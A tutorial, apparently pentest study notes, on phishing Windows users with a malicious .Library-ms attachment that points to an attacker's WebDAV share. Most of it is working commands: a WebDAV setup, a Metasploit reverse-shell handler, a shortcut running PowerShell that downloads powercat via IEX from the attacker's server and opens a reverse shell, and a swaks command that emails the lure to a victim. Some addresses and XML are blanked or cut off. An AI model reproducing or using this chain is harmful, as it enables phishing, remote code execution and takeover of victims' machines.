Skip to content

Abusing Windows Library Files

What you will need

  • kali machine
    • crete payload
    • expose WebDAV share
  • windows machine
    • create link

Setup WebDAV on Kali

  • we need to setup webdav on kali
  • we need to add test.txt as poc, later we will put link that will open rev shell to our kali


pip3 install wsgidav

create share

mkdir -p /home/kali/workspace/webdav

creat first POC file

echo "szalek" > /home/kali/workspace/webdav/test.txt


/home/kali/.local/bin/wsgidav --host= --port=80 --auth=anonymous --root /home/kali/workspace/webdav/


  • config.Library-ms file will be our attachment
  • double click on that will navigate user to webdav share


<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="">

  • we need to access webdav share from windows and there create malicious link
  • to do that we can create copy of config.Library-ms on windows machine and double-click it
  • orginal config.Library-ms will stay on kali as we want to deliver it to victim user

open WebDAV share

on windows - from powershell

notepad config.Library-ms

on kali

mkdir -p /home/kali/workspace/www
cd /home/kali/workspace/www
cp /opt/windows/powercat/powercat.ps1 .
python3 -m http.server 8080

on kali

msfconsole -q -x "use multi/handler; set payload windows/x64/powershell_reverse_tcp; set lhost $IP_LOCAL; set lport 4444; exploit"

on windows

automatic_configuration file will be our link that victime supposed to click

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString(''); powercat -c -p 4444 -e powershell"

Deliver payload

swaks --to --from --header "EmailHacked" --body 'BodyStart File for you BodyEnd' --attach config.Library-ms --server $IP_MAIL


After few seconds we should see - that some one access WebDAV share - that some one click on our link - that powercat.ps1 file is downloaded - that revshell into metasploit is establised - BOOM! we have acceess